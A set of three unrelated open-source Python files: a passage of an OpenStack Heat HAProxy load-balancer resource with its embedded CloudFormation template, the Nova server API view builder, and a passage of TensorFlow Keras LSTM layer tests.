"Default" : []
}
},
"Resources": {
"latency_watcher": {
"Type": "AWS::CloudWatch::Alarm",
"Properties": {
"MetricName": "Latency",
"Namespace": "AWS/ELB",
"Statistic": "Average",
"Period": "60",
"EvaluationPeriods": "1",
"Threshold": "2",
"AlarmActions": [],
"ComparisonOperator": "GreaterThanThreshold"
}
},
"CfnLBUser" : {
"Type" : "AWS::IAM::User"
},
"CfnLBAccessKey" : {
"Type" : "AWS::IAM::AccessKey",
"Properties" : {
"UserName" : {"Ref": "CfnLBUser"}
}
},
"LB_instance": {
"Type": "AWS::EC2::Instance",
"Metadata": {
"AWS::CloudFormation::Init": {
"config": {
"packages": {
"yum": {
"haproxy" : [],
"socat" : []
}
},
"services": {
"systemd": {
"crond" : { "enabled" : "true", "ensureRunning" : "true" }
}
},
"files": {
"/etc/cfn/cfn-credentials" : {
"content" : { "Fn::Join" : ["", [
"AWSAccessKeyId=", { "Ref" : "CfnLBAccessKey" }, "\n",
"AWSSecretKey=", {"Fn::GetAtt": ["CfnLBAccessKey",
"SecretAccessKey"]}, "\n"
]]},
"mode" : "000400",
"owner" : "root",
"group" : "root"
},
"/etc/cfn/cfn-hup.conf" : {
"content" : { "Fn::Join" : ["", [
"[main]\n",
"stack=", { "Ref" : "AWS::StackId" }, "\n",
"credential-file=/etc/cfn/cfn-credentials\n",
"region=", { "Ref" : "AWS::Region" }, "\n",
"interval=60\n"
]]},
"mode" : "000400",
"owner" : "root",
"group" : "root"
},
"/etc/cfn/hooks.conf" : {
"content": { "Fn::Join" : ["", [
"[cfn-init]\n",
"triggers=post.update\n",
"path=Resources.LB_instance.Metadata\n",
"action=/opt/aws/bin/cfn-init -s ",
{ "Ref": "AWS::StackId" },
" -r LB_instance ",
" --region ", { "Ref": "AWS::Region" }, "\n",
"runas=root\n",
"\n",
"[reload]\n",
"triggers=post.update\n",
"path=Resources.LB_instance.Metadata\n",
"action=systemctl reload-or-restart haproxy.service\n",
"runas=root\n"
]]},
"mode" : "000400",
"owner" : "root",
"group" : "root"
},
"/etc/haproxy/haproxy.cfg": {
"content": "",
"mode": "000644",
"owner": "root",
"group": "root"
},
"/root/haproxy_tmp.te": {
"mode": "000600",
"owner": "root",
"group": "root",
"content": { "Fn::Join" : [ "", [
"module haproxy_tmp 1.0;\n",
"require { type tmp_t; type haproxy_t;",
"class sock_file { rename write create unlink link };",
"class dir { write remove_name add_name };}\n",
"allow haproxy_t ",
"tmp_t:dir { write remove_name add_name };\n",
"allow haproxy_t ",
"tmp_t:sock_file { rename write create unlink link};\n"
]]}
},
"/tmp/cfn-hup-crontab.txt" : {
"content" : { "Fn::Join" : ["", [
"MAIL=\"\"\n",
"\n",
"* * * * * /opt/aws/bin/cfn-hup -f\n",
"* * * * * /opt/aws/bin/cfn-push-stats ",
" --watch ", { "Ref" : "latency_watcher" }, " --haproxy\n"
]]},
"mode" : "000600",
"owner" : "root",
"group" : "root"
}
}
}
}
},
"Properties": {
"ImageId": { "Ref": "LbImageId" },
"InstanceType": { "Ref": "LbFlavor" },
"KeyName": { "Ref": "KeyName" },
"SecurityGroups": { "Ref": "SecurityGroups" },
"UserData": { "Fn::Base64": { "Fn::Join": ["", [
"#!/bin/bash -v\n",
"# Helper function\n",
"function error_exit\n",
"{\n",
" /opt/aws/bin/cfn-signal -e 1 -r \"$1\" '",
{ "Ref" : "WaitHandle" }, "'\n",
" exit 1\n",
"}\n",
"/opt/aws/bin/cfn-init -s ",
{ "Ref": "AWS::StackId" },
" -r LB_instance ",
" --region ", { "Ref": "AWS::Region" },
" || error_exit 'Failed to run cfn-init'\n",
"# HAProxy+SELinux, https://www.mankier.com/8/haproxy_selinux \n",
"# this is exported by selinux-policy >=3.12.1.196\n",
"setsebool haproxy_connect_any 1\n",
"# when the location of haproxy stats file is fixed\n",
"# in heat-cfntools and AWS::ElasticLoadBalancing::LoadBalancer\n",
"# to point to /var/lib/haproxy/stats, \n",
"# this next block can be removed.\n",
"# compile custom module to allow /tmp files and sockets access\n",
"cd /root\n",
"checkmodule -M -m -o haproxy_tmp.mod haproxy_tmp.te\n",
"semodule_package -o haproxy_tmp.pp -m haproxy_tmp.mod\n",
"semodule -i haproxy_tmp.pp\n",
"touch /tmp/.haproxy-stats\n",
"semanage fcontext -a -t haproxy_tmpfs_t /tmp/.haproxy-stats\n",
"restorecon -R -v /tmp/.haproxy-stats\n",
"# install cfn-hup crontab\n",
"crontab /tmp/cfn-hup-crontab.txt\n",
"# restart haproxy service to catch initial changes\n",
"systemctl reload-or-restart haproxy.service\n",
"# LB setup completed, signal success\n",
"/opt/aws/bin/cfn-signal -e 0 -r \"LB server setup complete\" '",
{ "Ref" : "WaitHandle" }, "'\n"
]]}}
}
},
"WaitHandle" : {
"Type" : "AWS::CloudFormation::WaitConditionHandle"
},
"WaitCondition" : {
"Type" : "AWS::CloudFormation::WaitCondition",
"DependsOn" : "LB_instance",
"Properties" : {
"Handle" : {"Ref" : "WaitHandle"},
"Timeout" : {"Ref" : "LBTimeout"}
}
}
},
"Outputs": {
"PublicIp": {
"Value": { "Fn::GetAtt": [ "LB_instance", "PublicIp" ] },
"Description": "instance IP"
}
}
}
'''
# Allow user to provide alternative nested stack template to the above
loadbalancer_opts = [
cfg.StrOpt('loadbalancer_template',
help=_('Custom template for the built-in '
'loadbalancer nested stack.'))]
cfg.CONF.register_opts(loadbalancer_opts)
class LoadBalancer(stack_resource.StackResource):
"""Implements a HAProxy-bearing instance as a nested stack.
The template for the nested stack can be redefined with
``loadbalancer_template`` option in ``heat.conf``.
Generally the image used for the instance must have the following
packages installed or available for installation at runtime::
- heat-cfntools and its dependencies like python-psutil
- cronie
- socat
- haproxy
Current default builtin template uses Fedora 21 x86_64 base cloud image
(https://getfedora.org/cloud/download/)
and apart from installing packages goes through some hoops
around SELinux due to pecularities of heat-cfntools.
"""
PROPERTIES = (
AVAILABILITY_ZONES, HEALTH_CHECK, INSTANCES, LISTENERS,
APP_COOKIE_STICKINESS_POLICY, LBCOOKIE_STICKINESS_POLICY,
SECURITY_GROUPS, SUBNETS,
) = (
'AvailabilityZones', 'HealthCheck', 'Instances', 'Listeners',
'AppCookieStickinessPolicy', 'LBCookieStickinessPolicy',
'SecurityGroups', 'Subnets',
)
_HEALTH_CHECK_KEYS = (
HEALTH_CHECK_HEALTHY_THRESHOLD, HEALTH_CHECK_INTERVAL,
HEALTH_CHECK_TARGET, HEALTH_CHECK_TIMEOUT,
HEALTH_CHECK_UNHEALTHY_THRESHOLD,
) = (
'HealthyThreshold', 'Interval',
'Target', 'Timeout',
'UnhealthyThreshold',
)
_LISTENER_KEYS = (
LISTENER_INSTANCE_PORT, LISTENER_LOAD_BALANCER_PORT, LISTENER_PROTOCOL,
LISTENER_SSLCERTIFICATE_ID, LISTENER_POLICY_NAMES,
) = (
'InstancePort', 'LoadBalancerPort', 'Protocol',
'SSLCertificateId', 'PolicyNames',
)
ATTRIBUTES = (
CANONICAL_HOSTED_ZONE_NAME, CANONICAL_HOSTED_ZONE_NAME_ID, DNS_NAME,
SOURCE_SECURITY_GROUP_GROUP_NAME, SOURCE_SECURITY_GROUP_OWNER_ALIAS,
) = (
'CanonicalHostedZoneName', 'CanonicalHostedZoneNameID', 'DNSName',
'SourceSecurityGroup.GroupName', 'SourceSecurityGroup.OwnerAlias',
)
properties_schema = {
AVAILABILITY_ZONES: properties.Schema(
properties.Schema.LIST,
_('The Availability Zones in which to create the load balancer.'),
required=True
),
HEALTH_CHECK: properties.Schema(
properties.Schema.MAP,
_('An application health check for the instances.'),
schema={
HEALTH_CHECK_HEALTHY_THRESHOLD: properties.Schema(
properties.Schema.INTEGER,
_('The number of consecutive health probe successes '
'required before moving the instance to the '
'healthy state.'),
required=True
),
HEALTH_CHECK_INTERVAL: properties.Schema(
properties.Schema.INTEGER,
_('The approximate interval, in seconds, between '
'health checks of an individual instance.'),
required=True
),
HEALTH_CHECK_TARGET: properties.Schema(
properties.Schema.STRING,
_('The port being checked.'),
required=True
),
HEALTH_CHECK_TIMEOUT: properties.Schema(
properties.Schema.INTEGER,
_('Health probe timeout, in seconds.'),
required=True
),
HEALTH_CHECK_UNHEALTHY_THRESHOLD: properties.Schema(
properties.Schema.INTEGER,
_('The number of consecutive health probe failures '
'required before moving the instance to the '
'unhealthy state'),
required=True
),
}
),
INSTANCES: properties.Schema(
properties.Schema.LIST,
_('The list of instance IDs load balanced.'),
update_allowed=True
),
LISTENERS: properties.Schema(
properties.Schema.LIST,
_('One or more listeners for this load balancer.'),
schema=properties.Schema(
properties.Schema.MAP,
schema={
LISTENER_INSTANCE_PORT: properties.Schema(
properties.Schema.INTEGER,
_('TCP port on which the instance server is '
'listening.'),
required=True
),
LISTENER_LOAD_BALANCER_PORT: properties.Schema(
properties.Schema.INTEGER,
_('The external load balancer port number.'),
required=True
),
LISTENER_PROTOCOL: properties.Schema(
properties.Schema.STRING,
_('The load balancer transport protocol to use.'),
required=True,
constraints=[
constraints.AllowedValues(['TCP', 'HTTP']),
]
),
LISTENER_SSLCERTIFICATE_ID: properties.Schema(
properties.Schema.STRING,
_('Not Implemented.'),
implemented=False
),
LISTENER_POLICY_NAMES: properties.Schema(
properties.Schema.LIST,
_('Not Implemented.'),
implemented=False
),
},
),
required=True
),
APP_COOKIE_STICKINESS_POLICY: properties.Schema(
properties.Schema.STRING,
_('Not Implemented.'),
implemented=False
),
LBCOOKIE_STICKINESS_POLICY: properties.Schema(
properties.Schema.STRING,
_('Not Implemented.'),
implemented=False
),
SECURITY_GROUPS: properties.Schema(
properties.Schema.LIST,
_('List of Security Groups assigned on current LB.'),
update_allowed=True
),
SUBNETS: properties.Schema(
properties.Schema.LIST,
_('Not Implemented.'),
implemented=False
),
}
attributes_schema = {
CANONICAL_HOSTED_ZONE_NAME: attributes.Schema(
_("The name of the hosted zone that is associated with the "
"LoadBalancer."),
type=attributes.Schema.STRING
),
CANONICAL_HOSTED_ZONE_NAME_ID: attributes.Schema(
_("The ID of the hosted zone name that is associated with the "
"LoadBalancer."),
type=attributes.Schema.STRING
),
DNS_NAME: attributes.Schema(
_("The DNS name for the LoadBalancer."),
type=attributes.Schema.STRING
),
SOURCE_SECURITY_GROUP_GROUP_NAME: attributes.Schema(
_("The security group that you can use as part of your inbound "
"rules for your LoadBalancer's back-end instances."),
type=attributes.Schema.STRING
),
SOURCE_SECURITY_GROUP_OWNER_ALIAS: attributes.Schema(
_("Owner of the source security group."),
type=attributes.Schema.STRING
),
}
def _haproxy_config_global(self):
return '''
global
daemon
maxconn 256
stats socket /tmp/.haproxy-stats
defaults
mode http
timeout connect 5000ms
timeout client 50000ms
timeout server 50000ms
'''
def _haproxy_config_frontend(self):
listener = self.properties[self.LISTENERS][0]
lb_port = listener[self.LISTENER_LOAD_BALANCER_PORT]
return '''
frontend http
bind *:%s
default_backend servers
''' % (lb_port)
def _haproxy_config_backend(self):
health_chk = self.properties[self.HEALTH_CHECK]
if health_chk:
timeout = int(health_chk[self.HEALTH_CHECK_TIMEOUT])
timeout_check = 'timeout check %ds' % timeout
spaces = ' '
else:
timeout_check = ''
spaces = ''
return '''
backend servers
balance roundrobin
option http-server-close
option forwardfor
option httpchk
%s%s
''' % (spaces, timeout_check)
def _haproxy_config_servers(self, instances):
listener = self.properties[self.LISTENERS][0]
inst_port = listener[self.LISTENER_INSTANCE_PORT]
spaces = ' '
check = ''
health_chk = self.properties[self.HEALTH_CHECK]
if health_chk:
check = ' check inter %ss fall %s rise %s' % (
health_chk[self.HEALTH_CHECK_INTERVAL],
health_chk[self.HEALTH_CHECK_UNHEALTHY_THRESHOLD],
health_chk[self.HEALTH_CHECK_HEALTHY_THRESHOLD])
servers = []
n = 1
nova_cp = self.client_plugin('nova')
for i in instances or []:
ip = nova_cp.server_to_ipaddress(i) or '0.0.0.0'
LOG.debug('haproxy server:%s', ip)
servers.append('%sserver server%d %s:%s%s' % (spaces, n,
ip, inst_port,
check))
n = n + 1
return '\n'.join(servers)
def _haproxy_config(self, instances):
# initial simplifications:
# - only one Listener
# - only http (no tcp or ssl)
#
# option httpchk HEAD /check.txt HTTP/1.0
return '%s%s%s%s\n' % (self._haproxy_config_global(),
self._haproxy_config_frontend(),
self._haproxy_config_backend(),
self._haproxy_config_servers(instances))
def get_parsed_template(self):
if cfg.CONF.loadbalancer_template:
with open(cfg.CONF.loadbalancer_template) as templ_fd:
LOG.info('Using custom loadbalancer template %s',
cfg.CONF.loadbalancer_template)
contents = templ_fd.read()
else:
contents = lb_template_default
return template_format.parse(contents)
def child_params(self):
params = {}
params['SecurityGroups'] = self.properties[self.SECURITY_GROUPS]
# If the owning stack defines KeyName, we use that key for the nested
# template, otherwise use no key
for magic_param in ('KeyName', 'LbFlavor', 'LBTimeout', 'LbImageId'):
if magic_param in self.stack.parameters:
params[magic_param] = self.stack.parameters[magic_param]
return params
def child_template(self):
templ = self.get_parsed_template()
# If the owning stack defines KeyName, we use that key for the nested
# template, otherwise use no key
if 'KeyName' not in self.stack.parameters:
del templ['Resources']['LB_instance']['Properties']['KeyName']
del templ['Parameters']['KeyName']
return templ
def handle_create(self):
templ = self.child_template()
params = self.child_params()
if self.properties[self.INSTANCES]:
md = templ['Resources']['LB_instance']['Metadata']
files = md['AWS::CloudFormation::Init']['config']['files']
cfg = self._haproxy_config(self.properties[self.INSTANCES])
files['/etc/haproxy/haproxy.cfg']['content'] = cfg
return self.create_with_template(templ, params)
def handle_update(self, json_snippet, tmpl_diff, prop_diff):
"""Re-generate the Metadata.
Save it to the db.
Rely on the cfn-hup to reconfigure HAProxy.
"""
new_props = json_snippet.properties(self.properties_schema,
self.context)
# Valid use cases are:
# - Membership controlled by members property in template
# - Empty members property in template; membership controlled by
# "updates" triggered from autoscaling group.
# Mixing the two will lead to undefined behaviour.
if (self.INSTANCES in prop_diff and
(self.properties[self.INSTANCES] is not None or
new_props[self.INSTANCES] is not None)):
cfg = self._haproxy_config(prop_diff[self.INSTANCES])
md = self.nested()['LB_instance'].metadata_get()
files = md['AWS::CloudFormation::Init']['config']['files']
files['/etc/haproxy/haproxy.cfg']['content'] = cfg
self.nested()['LB_instance'].metadata_set(md)
if self.SECURITY_GROUPS in prop_diff:
templ = self.child_template()
params = self.child_params()
params['SecurityGroups'] = new_props[self.SECURITY_GROUPS]
self.update_with_template(templ, params)
def check_update_complete(self, updater):
"""Because we are not calling update_with_template, return True."""
return True
def validate(self):
"""Validate any of the provided params."""
res = super(LoadBalancer, self).validate()
if res:
return res
if (cfg.CONF.loadbalancer_template and
not os.access(cfg.CONF.loadbalancer_template, os.R_OK)):
msg = _('Custom LoadBalancer template can not be found')
raise exception.StackValidationFailed(message=msg)
health_chk = self.properties[self.HEALTH_CHECK]
if health_chk:
interval = float(health_chk[self.HEALTH_CHECK_INTERVAL])
timeout = float(health_chk[self.HEALTH_CHECK_TIMEOUT])
if interval < timeout:
return {'Error':
'Interval must be larger than Timeout'}
def get_reference_id(self):
return six.text_type(self.name)
def _resolve_attribute(self, name):
"""We don't really support any of these yet."""
if name == self.DNS_NAME:
try:
return self.get_output('PublicIp')
except exception.NotFound:
raise exception.InvalidTemplateAttribute(resource=self.name,
key=name)
elif name in self.attributes_schema:
# Not sure if we should return anything for the other attribs
# since they aren't really supported in any meaningful way
return ''
def resource_mapping():
return {
'AWS::ElasticLoadBalancing::LoadBalancer': LoadBalancer,
}
|
|
# Copyright 2010-2011 OpenStack Foundation
# Copyright 2011 Piston Cloud Computing, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import hashlib
from oslo.utils import timeutils
from nova.api.openstack import common
from nova.api.openstack.compute.views import addresses as views_addresses
from nova.api.openstack.compute.views import flavors as views_flavors
from nova.api.openstack.compute.views import images as views_images
from nova.compute import flavors
from nova.i18n import _LW
from nova.objects import base as obj_base
from nova.openstack.common import log as logging
from nova import utils
LOG = logging.getLogger(__name__)
class ViewBuilder(common.ViewBuilder):
"""Model a server API response as a python dictionary."""
_collection_name = "servers"
_progress_statuses = (
"ACTIVE",
"BUILD",
"REBUILD",
"RESIZE",
"VERIFY_RESIZE",
)
_fault_statuses = (
"ERROR", "DELETED"
)
def __init__(self):
"""Initialize view builder."""
super(ViewBuilder, self).__init__()
self._address_builder = views_addresses.ViewBuilder()
self._flavor_builder = views_flavors.ViewBuilder()
self._image_builder = views_images.ViewBuilder()
def create(self, request, instance):
"""View that should be returned when an instance is created."""
return {
"server": {
"id": instance["uuid"],
"links": self._get_links(request,
instance["uuid"],
self._collection_name),
},
}
def basic(self, request, instance):
"""Generic, non-detailed view of an instance."""
return {
"server": {
"id": instance["uuid"],
"name": instance["display_name"],
"links": self._get_links(request,
instance["uuid"],
self._collection_name),
},
}
def show(self, request, instance):
"""Detailed view of a single instance."""
ip_v4 = instance.get('access_ip_v4')
ip_v6 = instance.get('access_ip_v6')
server = {
"server": {
"id": instance["uuid"],
"name": instance["display_name"],
"status": self._get_vm_status(instance),
"tenant_id": instance.get("project_id") or "",
"user_id": instance.get("user_id") or "",
"metadata": self._get_metadata(instance),
"hostId": self._get_host_id(instance) or "",
"image": self._get_image(request, instance),
"flavor": self._get_flavor(request, instance),
"created": timeutils.isotime(instance["created_at"]),
"updated": timeutils.isotime(instance["updated_at"]),
"addresses": self._get_addresses(request, instance),
"accessIPv4": str(ip_v4) if ip_v4 is not None else '',
"accessIPv6": str(ip_v6) if ip_v6 is not None else '',
"links": self._get_links(request,
instance["uuid"],
self._collection_name),
},
}
if server["server"]["status"] in self._fault_statuses:
_inst_fault = self._get_fault(request, instance)
if _inst_fault:
server['server']['fault'] = _inst_fault
if server["server"]["status"] in self._progress_statuses:
server["server"]["progress"] = instance.get("progress", 0)
return server
def index(self, request, instances):
"""Show a list of servers without many details."""
coll_name = self._collection_name
return self._list_view(self.basic, request, instances, coll_name)
def detail(self, request, instances):
"""Detailed view of a list of instance."""
coll_name = self._collection_name + '/detail'
return self._list_view(self.show, request, instances, coll_name)
def _list_view(self, func, request, servers, coll_name):
"""Provide a view for a list of servers.
:param func: Function used to format the server data
:param request: API request
:param servers: List of servers in dictionary format
:param coll_name: Name of collection, used to generate the next link
for a pagination query
:returns: Server data in dictionary format
"""
server_list = [func(request, server)["server"] for server in servers]
servers_links = self._get_collection_links(request,
servers,
coll_name)
servers_dict = dict(servers=server_list)
if servers_links:
servers_dict["servers_links"] = servers_links
return servers_dict
@staticmethod
def _get_metadata(instance):
# FIXME(danms): Transitional support for objects
metadata = instance.get('metadata')
if isinstance(instance, obj_base.NovaObject):
return metadata or {}
else:
return utils.instance_meta(instance)
@staticmethod
def _get_vm_status(instance):
# If the instance is deleted the vm and task states don't really matter
if instance.get("deleted"):
return "DELETED"
return common.status_from_state(instance.get("vm_state"),
instance.get("task_state"))
@staticmethod
def _get_host_id(instance):
host = instance.get("host")
project = str(instance.get("project_id"))
if host:
sha_hash = hashlib.sha224(project + host) # pylint: disable=E1101
return sha_hash.hexdigest()
def _get_addresses(self, request, instance):
context = request.environ["nova.context"]
networks = common.get_networks_for_instance(context, instance)
return self._address_builder.index(networks)["addresses"]
def _get_image(self, request, instance):
image_ref = instance["image_ref"]
if image_ref:
image_id = str(common.get_id_from_href(image_ref))
bookmark = self._image_builder._get_bookmark_link(request,
image_id,
"images")
return {
"id": image_id,
"links": [{
"rel": "bookmark",
"href": bookmark,
}],
}
else:
return ""
def _get_flavor(self, request, instance):
instance_type = flavors.extract_flavor(instance)
if not instance_type:
LOG.warn(_LW("Instance has had its instance_type removed "
"from the DB"), instance=instance)
return {}
flavor_id = instance_type["flavorid"]
flavor_bookmark = self._flavor_builder._get_bookmark_link(request,
flavor_id,
"flavors")
return {
"id": str(flavor_id),
"links": [{
"rel": "bookmark",
"href": flavor_bookmark,
}],
}
def _get_fault(self, request, instance):
# This can result in a lazy load of the fault information
fault = instance.fault
if not fault:
return None
fault_dict = {
"code": fault["code"],
"created": timeutils.isotime(fault["created_at"]),
"message": fault["message"],
}
if fault.get('details', None):
is_admin = False
context = request.environ["nova.context"]
if context:
is_admin = getattr(context, 'is_admin', False)
if is_admin or fault['code'] != 500:
fault_dict['details'] = fault["details"]
return fault_dict
class ViewBuilderV3(ViewBuilder):
"""Model a server V3 API response as a python dictionary."""
def __init__(self):
"""Initialize view builder."""
super(ViewBuilderV3, self).__init__()
self._address_builder = views_addresses.ViewBuilderV3()
# TODO(alex_xu): In V3 API, we correct the image bookmark link to
# use glance endpoint. We revert back it to use nova endpoint for v2.1.
self._image_builder = views_images.ViewBuilder()
def show(self, request, instance):
"""Detailed view of a single instance."""
server = {
"server": {
"id": instance["uuid"],
"name": instance["display_name"],
"status": self._get_vm_status(instance),
"tenant_id": instance.get("project_id") or "",
"user_id": instance.get("user_id") or "",
"metadata": self._get_metadata(instance),
"hostId": self._get_host_id(instance) or "",
# TODO(alex_xu): '_get_image' return {} when there image_ref
# isn't existed in V3 API, we revert it back to return "" in
# V2.1.
"image": self._get_image(request, instance),
"flavor": self._get_flavor(request, instance),
"created": timeutils.isotime(instance["created_at"]),
"updated": timeutils.isotime(instance["updated_at"]),
"addresses": self._get_addresses(request, instance),
"links": self._get_links(request,
instance["uuid"],
self._collection_name),
},
}
if server["server"]["status"] in self._fault_statuses:
_inst_fault = self._get_fault(request, instance)
if _inst_fault:
server['server']['fault'] = _inst_fault
if server["server"]["status"] in self._progress_statuses:
server["server"]["progress"] = instance.get("progress", 0)
return server
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for LSTM layer."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
from absl.testing import parameterized
import numpy as np
from tensorflow.python import keras
from tensorflow.python.eager import context
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.platform import test
from tensorflow.python.training import adam
from tensorflow.python.training import gradient_descent
@keras_parameterized.run_all_keras_modes
class LSTMLayerTest(keras_parameterized.TestCase):
def test_return_sequences_LSTM(self):
num_samples = 2
timesteps = 3
embedding_dim = 4
units = 2
testing_utils.layer_test(
keras.layers.LSTM,
kwargs={'units': units,
'return_sequences': True},
input_shape=(num_samples, timesteps, embedding_dim))
@test.disable_with_predicate(
pred=test.is_built_with_rocm,
skip_message='Double type is yet not supported in ROCm')
@testing_utils.run_v2_only
def test_float64_LSTM(self):
num_samples = 2
timesteps = 3
embedding_dim = 4
units = 2
testing_utils.layer_test(
keras.layers.LSTM,
kwargs={'units': units,
'return_sequences': True,
'dtype': 'float64'},
input_shape=(num_samples, timesteps, embedding_dim),
input_dtype='float64')
def test_static_shape_inference_LSTM(self):
# Github issue: 15165
timesteps = 3
embedding_dim = 4
units = 2
model = keras.models.Sequential()
inputs = keras.layers.Dense(embedding_dim,
input_shape=(timesteps, embedding_dim))
model.add(inputs)
layer = keras.layers.LSTM(units, return_sequences=True)
model.add(layer)
outputs = model.layers[-1].output
self.assertEqual(outputs.shape.as_list(), [None, timesteps, units])
def test_dynamic_behavior_LSTM(self):
num_samples = 2
timesteps = 3
embedding_dim = 4
units = 2
layer = keras.layers.LSTM(units, input_shape=(None, embedding_dim))
model = keras.models.Sequential()
model.add(layer)
model.compile(
'rmsprop',
'mse',
run_eagerly=testing_utils.should_run_eagerly())
x = np.random.random((num_samples, timesteps, embedding_dim))
y = np.random.random((num_samples, units))
model.train_on_batch(x, y)
def test_dropout_LSTM(self):
num_samples = 2
timesteps = 3
embedding_dim = 4
units = 2
testing_utils.layer_test(
keras.layers.LSTM,
kwargs={'units': units,
'dropout': 0.1,
'recurrent_dropout': 0.1},
input_shape=(num_samples, timesteps, embedding_dim))
def test_recurrent_dropout_with_implementation_restriction(self):
layer = keras.layers.LSTM(2, recurrent_dropout=0.1, implementation=2)
# The implementation is force to 1 due to the limit of recurrent_dropout.
self.assertEqual(layer.implementation, 1)
@parameterized.parameters([0, 1, 2])
def test_implementation_mode_LSTM(self, implementation_mode):
num_samples = 2
timesteps = 3
embedding_dim = 4
units = 2
testing_utils.layer_test(
keras.layers.LSTM,
kwargs={'units': units,
'implementation': implementation_mode},
input_shape=(num_samples, timesteps, embedding_dim))
def test_constraints_LSTM(self):
embedding_dim = 4
layer_class = keras.layers.LSTM
k_constraint = keras.constraints.max_norm(0.01)
r_constraint = keras.constraints.max_norm(0.01)
b_constraint = keras.constraints.max_norm(0.01)
layer = layer_class(
5,
return_sequences=False,
weights=None,
input_shape=(None, embedding_dim),
kernel_constraint=k_constraint,
recurrent_constraint=r_constraint,
bias_constraint=b_constraint)
layer.build((None, None, embedding_dim))
self.assertEqual(layer.cell.kernel.constraint, k_constraint)
self.assertEqual(layer.cell.recurrent_kernel.constraint, r_constraint)
self.assertEqual(layer.cell.bias.constraint, b_constraint)
@parameterized.parameters([True, False])
@test.disable_with_predicate(
pred=test.is_built_with_rocm,
skip_message='Skipping as ROCm MIOpen does not support padded input.')
def test_with_masking_layer_LSTM(self, unroll):
layer_class = keras.layers.LSTM
inputs = np.random.random((2, 3, 4))
targets = np.abs(np.random.random((2, 3, 5)))
targets /= targets.sum(axis=-1, keepdims=True)
model = keras.models.Sequential()
model.add(keras.layers.Masking(input_shape=(3, 4)))
model.add(layer_class(units=5, return_sequences=True, unroll=unroll))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
run_eagerly=testing_utils.should_run_eagerly())
model.fit(inputs, targets, epochs=1, batch_size=2, verbose=1)
@parameterized.parameters([True, False])
def test_masking_with_stacking_LSTM(self, unroll):
inputs = np.random.random((2, 3, 4))
targets = np.abs(np.random.random((2, 3, 5)))
targets /= targets.sum(axis=-1, keepdims=True)
model = keras.models.Sequential()
model.add(keras.layers.Masking(input_shape=(3, 4)))
lstm_cells = [keras.layers.LSTMCell(10), keras.layers.LSTMCell(5)]
model.add(keras.layers.RNN(
lstm_cells, return_sequences=True, unroll=unroll))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
run_eagerly=testing_utils.should_run_eagerly())
model.fit(inputs, targets, epochs=1, batch_size=2, verbose=1)
def test_from_config_LSTM(self):
layer_class = keras.layers.LSTM
for stateful in (False, True):
l1 = layer_class(units=1, stateful=stateful)
l2 = layer_class.from_config(l1.get_config())
assert l1.get_config() == l2.get_config()
def test_deep_copy_LSTM(self):
cell = keras.layers.LSTMCell(5)
copied_cell = copy.deepcopy(cell)
self.assertEqual(copied_cell.units, 5)
self.assertEqual(cell.get_config(), copied_cell.get_config())
def test_specify_initial_state_keras_tensor(self):
num_states = 2
timesteps = 3
embedding_dim = 4
units = 3
num_samples = 2
# Test with Keras tensor
inputs = keras.Input((timesteps, embedding_dim))
initial_state = [keras.Input((units,)) for _ in range(num_states)]
layer = keras.layers.LSTM(units)
if len(initial_state) == 1:
output = layer(inputs, initial_state=initial_state[0])
else:
output = layer(inputs, initial_state=initial_state)
self.assertTrue(
any(initial_state[0] is t
for t in layer._inbound_nodes[0].input_tensors))
model = keras.models.Model([inputs] + initial_state, output)
model.compile(
loss='categorical_crossentropy',
optimizer=adam.AdamOptimizer(),
run_eagerly=testing_utils.should_run_eagerly())
inputs = np.random.random((num_samples, timesteps, embedding_dim))
initial_state = [np.random.random((num_samples, units))
for _ in range(num_states)]
targets = np.random.random((num_samples, units))
model.train_on_batch([inputs] + initial_state, targets)
def test_specify_initial_state_non_keras_tensor(self):
num_states = 2
timesteps = 3
embedding_dim = 4
units = 3
num_samples = 2
# Test with non-Keras tensor
inputs = keras.Input((timesteps, embedding_dim))
initial_state = [keras.backend.random_normal_variable(
(num_samples, units), 0, 1)
for _ in range(num_states)]
layer = keras.layers.LSTM(units)
output = layer(inputs, initial_state=initial_state)
model = keras.models.Model(inputs, output)
model.compile(
loss='categorical_crossentropy',
optimizer=adam.AdamOptimizer(),
run_eagerly=testing_utils.should_run_eagerly())
inputs = np.random.random((num_samples, timesteps, embedding_dim))
targets = np.random.random((num_samples, units))
model.train_on_batch(inputs, targets)
def test_reset_states_with_values(self):
num_states = 2
timesteps = 3
embedding_dim = 4
units = 3
num_samples = 2
layer = keras.layers.LSTM(units, stateful=True)
layer.build((num_samples, timesteps, embedding_dim))
layer.reset_states()
assert len(layer.states) == num_states
assert layer.states[0] is not None
self.assertAllClose(
keras.backend.eval(layer.states[0]),
np.zeros(keras.backend.int_shape(layer.states[0])),
atol=1e-4)
state_shapes = [keras.backend.int_shape(state) for state in layer.states]
values = [np.ones(shape) for shape in state_shapes]
if len(values) == 1:
values = values[0]
layer.reset_states(values)
self.assertAllClose(
keras.backend.eval(layer.states[0]),
np.ones(keras.backend.int_shape(layer.states[0])),
atol=1e-4)
# Test with invalid data
with self.assertRaises(ValueError):
layer.reset_states([1] * (len(layer.states) + 1))
def test_specify_state_with_masking(self):
num_states = 2
timesteps = 3
embedding_dim = 4
units = 3
num_samples = 2
inputs = keras.Input((timesteps, embedding_dim))
_ = keras.layers.Masking()(inputs)
initial_state = [keras.Input((units,)) for _ in range(num_states)]
output = keras.layers.LSTM(units)(inputs, initial_state=initial_state)
model = keras.models.Model([inputs] + initial_state, output)
